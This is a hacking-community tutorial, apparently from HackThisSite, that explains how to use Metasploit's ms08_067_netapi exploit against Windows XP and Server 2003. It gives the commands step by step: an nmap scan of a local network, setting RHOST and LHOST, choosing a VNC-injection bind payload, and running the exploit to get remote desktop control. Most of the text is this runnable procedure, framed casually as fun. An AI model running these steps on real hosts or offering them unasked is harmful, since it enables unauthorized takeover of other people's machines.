"One of the best ways to get yourself a reputation as a dangerous citizen these days is to go about repeating the very phrases which our founding fathers used in the great struggle for independence." --Charles Austin Beard
Every one here , on this website , has probably heard of the metasploit framework. metasploit was originally written in perl , but later it was re-written in ruby.its basically a large database of exploit code , scanners , encoders and payloads ... to know more about metasploit visit the official website ,Here?
target :windows XP sp2 ( this exxploit also works with windows sever
2003 and windows xp sp3)
my OS :backtrack 5R2
so this is what msfconsole looks like -->
i recommend using metasploit on linux or atleast a linux virtual machine, the windows version isnt that powerfull
so after firing up metasploit this is what we do
nmap -sS -Pn -A 192.168.1.1/24
assuming your local address is the one i used , this command is used for "port-scanning" your local area network to find live hosts , and report the number of open ports and the services (DAEMONS) running on them
after finding a XPsp2 / sp3 /windows server 2003 system ... -->
set RHOST (local ip of remote host)
set LHOST 192.168.1.1
set THREADS 100
at this point you should get something like this
msf exploit(ms08_067_netapi) >
use the -show payloads- command to get a list of suitable payloads
im going to use a relective VNC injection
set PAYLOAD windows/vncinject/bind_tcp
all set now
type in exploit
and if the exploit succeeds
you will get a vnc session ... XD havefun
feel free to correct me ... :)
Cast your vote on this article 10 - Highest, 1 - Lowest
Comments: Published: 10 comments.
HackThisSite is is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.